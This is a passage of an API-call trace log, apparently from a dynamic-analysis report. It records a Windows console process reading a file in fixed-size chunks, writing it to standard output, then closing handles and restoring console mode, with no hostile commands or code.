(hFile=0x4c) returned 0x1 [0140.742] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.743] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, 
lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.745] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.746] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.747] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.747] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: 
lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.749] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.750] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.750] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 
[0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.752] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0140.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.752] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x32, lpOverlapped=0x0) returned 1 [0140.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.752] GetFileType (hFile=0x4c) returned 0x1 [0140.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.752] GetFileType (hFile=0x4c) returned 0x1 [0140.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.752] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x32, lpOverlapped=0x0) returned 1 [0140.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.752] _close (_FileHandle=4) returned 0 [0140.752] FindNextFileW (in: hFindFile=0x270eb8, lpFindFileData=0x18f0ec | out: lpFindFileData=0x18f0ec) returned 0 [0140.753] GetLastError () returned 0x12 [0140.753] FindClose (in: hFindFile=0x270eb8 | out: hFindFile=0x270eb8) returned 1 [0140.753] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.754] _close (_FileHandle=3) returned 0 [0140.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.754] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.754] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) 
